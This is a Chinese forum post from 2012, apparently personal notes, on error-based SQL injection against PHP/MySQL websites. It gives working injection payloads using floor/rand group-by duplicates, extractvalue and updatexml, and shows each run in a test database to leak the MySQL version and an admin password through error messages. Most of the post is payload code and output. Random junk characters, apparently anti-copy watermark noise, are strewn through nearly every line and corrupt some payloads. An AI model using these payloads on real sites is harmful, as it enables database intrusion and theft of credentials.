放点原来的笔记,Mysql在执行语句的时候会抛出异常信息信息,而php+mysql架构的网站往往又将错误代码显示在页面上,这样可以通过构造如下三种方法获取特定数据。5 `% w% _$ H( l$ `
实际测试环境:" Z% U- L5 J. w% D% p( ~
( E. S# g \3 p) d. K8 r: h
1 g. e3 v9 e) emysql> show tables;+ v+ C8 g; @2 q7 p5 S2 n( y
+----------------+
/ X+ J; i$ W# `( x, o4 X| Tables_in_test |2 O% _6 l1 ]7 i2 K6 }" z
+----------------+9 d' ^8 i" ]2 d
| admin |. O0 ~. t9 n6 _5 X, V5 K) s
| article |3 r% v) I4 S J3 N, l1 w9 Y
+----------------+3 ]! B( M+ Y' l/ v: u! n1 L
7 |! w0 \8 ]: ]7 z
# U0 X9 I |; d! V( q; k
# G( V2 W( I" n. C4 X J L
mysql> describe admin;/ M4 f6 c' ]/ [
+-------+------------------+------+-----+---------+----------------+
! J. R2 `9 J* n% l5 v1 {- N" Q| Field | Type | Null | Key | Default | Extra |
6 s! W/ l: f' |5 e' w+-------+------------------+------+-----+---------+----------------+
, P! k' Y8 M$ i: z$ v: b| id | int(10) unsigned | NO | PRI | NULL | auto_increment |
' A j! P) S2 Y4 _| user | varchar(50) | NO | | NULL | |8 }8 u6 T2 G' h0 w9 r* V4 n ~4 C1 \8 N
| pass | varchar(50) | NO | | NULL | |1 H" |4 Q$ x7 Q- ~0 y% ~
+-------+------------------+------+-----+---------+----------------+
! s6 ~2 [0 r; x
) s9 u4 S2 B+ C! O9 `; E5 X1 i. N
0 G, _8 N- B& I4 ~ 3 h9 g! L2 c' D X: K& N
mysql> describe article;( b X {- Z% x& | F
+---------+------------------+------+-----+---------+----------------+ t K1 M6 J0 Y3 J9 `+ }( F
| Field | Type | Null | Key | Default | Extra |0 w2 x2 X& @; |# g" G4 {1 a. ?2 g
+---------+------------------+------+-----+---------+----------------+
) r& Q* C6 ?' ?, Q1 F# R| id | int(10) unsigned | NO | PRI | NULL | auto_increment |% F* V( M7 J4 z
| title | varchar(50) | NO | | NULL | |
$ e5 y+ [: g! u: Z| content | varchar(50) | NO | | NULL | |
1 h$ P4 C* q! F+---------+------------------+------+-----+---------+----------------+
- C& m [3 Z( ?1、通过floor报错
' \1 V& K8 F8 Q7 J可以通过如下一些利用代码
" I) f! Y6 Y- F* i: A0 X- }9 @4 m& `* e
: O4 T: |6 j3 U- c) H
4 y/ {9 X9 ^& Y" j3 L. F) Mand select 1 from (select count(*),concat(version(),floor(rand(0)*2))x# n2 b/ S, f9 {2 Y3 K
from information_schema.tables group by x)a);
8 l2 G1 V" V3 n3 V5 V: c0 f . _4 \3 I6 ~/ a1 r% i
' \5 p+ d+ u/ W! g5 ?. gand (select count(*) from (select 1 union select null union select !1)x
0 a& M' H4 N4 y5 i2 @2 {group by concat((select table_name from information_schema.tables limit 1),
* J# M2 l: P8 I# v6 R, p5 Dfloor(rand(0)*2)));
8 t g/ p: v j5 ^/ G举例如下:
( M# Y* u; Z2 Q: @. Z1 P首先进行正常查询:. \6 `! w" B, w& q
. a, W; L- C$ s. D' g) @- d
mysql> select * from article where id = 1;' X8 o8 E% j& [3 D a2 c/ z
+----+-------+---------+
9 X3 y! i- W" A4 f8 }- E) X| id | title | content |
6 ~, {2 h' D p. }' T. U% k+----+-------+---------+
3 C* }( p( z7 K| 1 | test | do it |
T8 M' w f, p' k& q+ D8 v+----+-------+---------+" _) D5 B( N6 h4 t
假如id输入存在注入的话,可以通过如下语句进行报错。3 B7 P g( `6 g0 Y& M- W
( c+ D, D" P+ B6 F
; H5 | ~* t1 S% E2 [# y
mysql> select * from article where id = 1 and (select 1 from! j# Y! o& l' A5 g) L" J
(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
, s0 \9 `# k# nERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'/ h6 G) r7 _3 g$ V& R6 n2 y# }5 \* l
可以看到成功爆出了Mysql的版本,如果需要查询其他数据,可以通过修改version()所在位置语句进行查询。% Y0 U" N. Y2 J/ F9 ?8 V4 V0 U
例如我们需要查询管理员用户名和密码:8 L& f2 c* m# x* D }+ d& V: I6 p
Method1:
; T0 ]$ S5 U: B8 z% |
. f, k& A; @7 a( j% ] 6 p% C( F8 Z1 t$ L, t
mysql> select * from article where id = 1 and (select 1 from
$ L" L7 S) l) t6 D7 i(select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x
; A' K! ~# E: p' v# hfrom information_schema.tables group by x)a);: p: q% ?5 I6 j5 L
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'
/ H! G3 L% c% i7 }5 Z% ?) lMethod2:3 D8 y: X" m$ _' ^ ~3 O: F$ V [
. G# b: p& |/ f7 r: n
( d. O' E1 x1 Y8 }8 h
mysql> select * from article where id = 1 and (select count(*)
, _/ K8 R3 n. c q. Mfrom (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),
3 R; t7 b; M% W6 ~floor(rand(0)*2)));
! L: Z- R# I1 w/ ]ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'3 P3 }0 N6 I* Y6 i' |, i0 a9 M1 B
2、ExtractValue9 g: O7 t6 Y7 V& }2 p: F
测试语句如下5 d/ l4 `( Q4 d5 `
" T8 i$ v* N- |3 [& M
3 r$ h& o4 U ^) U: ]& _3 O! rand extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));
L1 K/ o, M) O- W" {3 H8 l实际测试过程
! G" W- E: g# O" a# r1 h m0 Z4 ~
$ ~* a' C. S) C 9 V/ A* W4 y) h$ a" t4 D
mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,
. {: a9 }' B, l& H(select pass from admin limit 1)));--) ^! \% d. h1 F# w% E6 \
ERROR 1105 (HY000): XPATH syntax error: '\admin888'3 \3 t0 [$ n! m9 o6 O7 S
3、UpdateXml
$ A3 Q7 ?% E' S; N# c7 @测试语句
' d7 Y7 G p5 ~: B 3 k4 r3 F1 A) n) r1 y" d! u
2 o4 M2 S2 n2 H( u
and 1=(updatexml(1,concat(0x5e24,(select user()),0x5e24),1))* T' }6 J8 v- @- N5 z; L
实际测试过程/ M2 q- [7 Z0 ^* v
, b/ E6 W. m) p
2 q# c1 h! C( o- m( Z1 l2 _mysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x5e24,
" H" {; {4 ?' p x7 e; n( v(select pass from admin limit 1),0x5e24),1));& U6 W. ~$ f9 S F! Z4 \- S) l" @
ERROR 1105 (HY000): XPATH syntax error: '^$admin888^$'8 m( b( \% U8 n! t) G) o% |+ y' [
All, thanks foreign guys. f# @* }0 D0 o. ^
1 `4 X5 y( z" [+ M$ w+ _" ?
% c5 s& r# T3 t4 \ |
发表于 2012-12-10 10:28:51
收藏
支持
反对